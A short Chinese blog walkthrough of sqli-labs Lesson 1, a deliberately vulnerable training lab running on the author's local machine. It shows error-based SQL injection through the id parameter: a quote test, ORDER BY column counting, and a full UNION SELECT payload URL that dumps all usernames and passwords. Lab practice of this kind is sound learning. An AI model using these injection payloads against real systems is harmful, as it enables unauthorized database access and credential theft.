sqli labs lession one

没有好的排版,大家凑乎看吧。

最近装了好了sqli labs,几经周折啊,mac上一开始装了,但mac自带的php版本不行,太高,mysql扩展已经没了。重新去下了php,但是对这个不熟悉,mysql扩展还是没有,虽然我包含了库。最后去win10下安装的,最后终于是搞定了。今天说一下lesson one的思路。界面如下:

1. 先看了源代码,没什么卵用,就不看了。

2.上面写的是把id当参数输入,试了一下,url: http://192.168.0.108/www/sqli-labs-master/sqli-labs-master/Less-1/?id=1

显示除了用户名和密码。尝试在修改参数看是否id存在注入,url:http://192.168.0.108/www/sqli-labs-master/sqli-labs-master/Less-1/?id=1'

显示报错,说明这里存在注入。

接下来就是用order by 判断输出个数,经测试为3个,url:http://192.168.0.108/www/sqli-labs-master/sqli-labs-master/Less-1/?id=1' order by 3%23,4个会提示没有第4列。

然后就是union select了,查数据库,查表名,查列名,具体不说了,贴一个最后的url:

http://192.168.0.108/www/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(distinct(username)),group_concat(distinct(password)) from users%23

最后显示所有的用户及密码,如下:

最后这个联系也就结束了。

有任何疑问,请留言,共同进步,谢谢。

 

 

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
牙科就诊管理系统利用当下成熟完善的SSM框架,使用跨平台的可开发大型商业网站的Java语言,以及最受欢迎的RDBMS应用软件之一的Mysql数据库进行程序开发。实现了用户在线查看数据。管理员管理病例管理、字典管理、公告管理、药单管理、药品管理、药品收藏管理、药品评价管理、药品订单管理、牙医管理、牙医收藏管理、牙医评价管理、牙医挂号管理、用户管理、管理员管理等功能。牙科就诊管理系统的开发根据操作人员需要设计的界面简洁美观,在功能模块布局上跟同类型网站保持一致,程序在实现基本要求功能时,也为数据信息面临的安全问题提供了一些实用的解决方案。可以说该程序在帮助管理者高效率地处理工作事务的同时,也实现了数据信息的整体化,规范化与自动化。 管理员在后台主要管理病例管理、字典管理、公告管理、药单管理、药品管理、药品收藏管理、药品评价管理、药品订单管理、牙医管理、牙医收藏管理、牙医评价管理、牙医挂号管理、用户管理、管理员管理等。 牙医列表页面,此页面提供给管理员的功能有:查看牙医、新增牙医、修改牙医、删除牙医等。公告信息管理页面提供的功能操作有:新增公告,修改公告,删除公告操作。公告类型管理页面显示所有公告类型,在此页面既可以让管理员添加新的公告信息类型,也能对已有的公告类型信息执行编辑更新,失效的公告类型信息也能让管理员快速删除。药品管理页面,此页面提供给管理员的功能有:新增药品,修改药品,删除药品。药品类型管理页面,此页面提供给管理员的功能有:新增药品类型,修改药品类型,删除药品类型。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值